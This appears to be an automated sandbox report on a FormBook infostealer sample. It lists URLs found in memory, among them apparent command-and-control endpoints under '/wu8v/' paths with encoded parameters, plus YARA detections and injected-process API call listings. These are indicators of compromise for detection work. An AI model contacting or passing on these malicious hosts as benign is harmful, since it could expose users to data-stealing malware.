            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004682000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004212000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://getgoodscrub.com/wu8v/?MdtlcTm=G9rRy2qYQIDZeyI4LJY6JNX1SXnAoDrMeesi9cL1NNtjWs0X9VQENpz2e8f5yO
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://parked.reg.bookmyname.com/images/lien_1.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://parked.reg.bookmyname.com/images/lien_2.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://parked.reg.bookmyname.com/images/lien_3.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://parked.reg.bookmyname.com/images/lien_4.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://parked.reg.bookmyname.com/images/lien_5.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://parked.reg.bookmyname.com/images/lien_6.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://parked.reg.bookmyname.com/images/lien_7.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://parked.reg.bookmyname.com/images/lien_8.gif
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3A961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.afilias.info/
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bookmyname.com/
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.eurid.eu/
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icann.org/
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004CCA000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.000000000485A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.insertcoen.com:80/wu8v/?MdtlcTm=jVsDngfN17jo53xCVVHLBYy1RtgDvNhrjbHy79NIDh3y3n8I8UoARbyDj
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4094582069.000000000580B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lm2ue.us
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4094582069.000000000580B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lm2ue.us/wu8v/
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.marksmile.com/asset/lp_qrcode.png
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.marksmile.com/asset/lp_style.css
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.neulevel.biz/
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.pir.org/
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000041CC000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000003D5C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lf6-cdn-tos.bytecdntp.com/cdn/expire-1-M/axios/0.26.0/axios.min.js
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sfc.exe, 0000000C.00000003.2023276943.0000000007BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mail.365.com/login.html
            Source: sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parked.reg.bookmyname.com/images/all_off.gif
            Source: sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parked.reg.bookmyname.com/images/es_off.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parked.reg.bookmyname.com/images/fr_banniere_haut.jpg
            Source: sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parked.reg.bookmyname.com/images/fr_on.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parked.reg.bookmyname.com/images/gb_off.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parked.reg.bookmyname.com/images/logo_book.gif
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parked.reg.bookmyname.com/styles/styles-redir.css
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bookmyname.com
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bookmyname.com/
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bookmyname.com/?wl=de
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bookmyname.com/?wl=en
            Source: sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bookmyname.com/?wl=es
            Source: sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bookmyname.com/?wl=fr
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bookmyname.com/nom_de_domaine/tarif_nom_de_domaine.html
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bookmyname.com/whois_informations_nom_de_domaine.html?wl=en
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bookmyname.com/whois_informations_nom_de_domaine.html?wl=fr
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bookmyname.com/whoisctc.cgi?wl=en
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000049A6000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000004536000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bookmyname.com/whoisctc.cgi?wl=fr
            Source: sfc.exe, 0000000C.00000002.4095332097.0000000007C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: sfc.exe, 0000000C.00000002.4093679938.0000000004814000.00000004.10000000.00040000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.00000000043A4000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.marksmile.com/
            Source: sfc.exe, 0000000C.00000002.4093679938.00000000041CC000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000003D5C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=luckydomainz.shop
            Source: sfc.exe, 0000000C.00000002.4095229118.0000000006160000.00000004.00000800.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.0000000003D5C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0042AE83 NtClose,5_2_0042AE83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057735C0 NtCreateMutant,LdrInitializeThunk,5_2_057735C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_05772DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_05772C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772B60 NtClose,LdrInitializeThunk,5_2_05772B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05774650 NtSuspendThread,5_2_05774650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05773010 NtOpenDirectoryObject,5_2_05773010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05773090 NtSetValueKey,5_2_05773090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05774340 NtSetContextThread,5_2_05774340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05773D70 NtOpenThread,5_2_05773D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772D30 NtUnmapViewOfSection,5_2_05772D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772D10 NtMapViewOfSection,5_2_05772D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05773D10 NtOpenProcessToken,5_2_05773D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772D00 NtSetInformationFile,5_2_05772D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772DD0 NtDelayExecution,5_2_05772DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772DB0 NtEnumerateKey,5_2_05772DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772C60 NtCreateKey,5_2_05772C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772C00 NtQueryInformationProcess,5_2_05772C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772CF0 NtOpenProcess,5_2_05772CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772CC0 NtQueryVirtualMemory,5_2_05772CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772CA0 NtQueryInformationToken,5_2_05772CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772F60 NtCreateProcessEx,5_2_05772F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772F30 NtCreateSection,5_2_05772F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772FE0 NtCreateFile,5_2_05772FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772FB0 NtResumeThread,5_2_05772FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772FA0 NtQuerySection,5_2_05772FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772F90 NtProtectVirtualMemory,5_2_05772F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772E30 NtWriteVirtualMemory,5_2_05772E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772EE0 NtQueueApcThread,5_2_05772EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772EA0 NtAdjustPrivilegesToken,5_2_05772EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772E80 NtReadVirtualMemory,5_2_05772E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057739B0 NtGetContextThread,5_2_057739B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772BF0 NtAllocateVirtualMemory,5_2_05772BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772BE0 NtQueryValueKey,5_2_05772BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772BA0 NtEnumerateValueKey,5_2_05772BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772B80 NtQueryInformationFile,5_2_05772B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772AF0 NtWriteFile,5_2_05772AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772AD0 NtReadFile,5_2_05772AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772AB0 NtWaitForSingleObject,5_2_05772AB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E4340 NtSetContextThread,LdrInitializeThunk,12_2_031E4340
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E4650 NtSuspendThread,LdrInitializeThunk,12_2_031E4650
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E35C0 NtCreateMutant,LdrInitializeThunk,12_2_031E35C0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2B60 NtClose,LdrInitializeThunk,12_2_031E2B60
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_031E2BA0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_031E2BF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2BE0 NtQueryValueKey,LdrInitializeThunk,12_2_031E2BE0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2AD0 NtReadFile,LdrInitializeThunk,12_2_031E2AD0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2AF0 NtWriteFile,LdrInitializeThunk,12_2_031E2AF0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E39B0 NtGetContextThread,LdrInitializeThunk,12_2_031E39B0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2F30 NtCreateSection,LdrInitializeThunk,12_2_031E2F30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2FB0 NtResumeThread,LdrInitializeThunk,12_2_031E2FB0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2FE0 NtCreateFile,LdrInitializeThunk,12_2_031E2FE0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_031E2E80
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2EE0 NtQueueApcThread,LdrInitializeThunk,12_2_031E2EE0
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2D10 NtMapViewOfSection,LdrInitializeThunk,12_2_031E2D10
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_031E2D30
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031E2DD0 NtDelayExecution,LdrInitializeThunk,12_2_031E2DD0
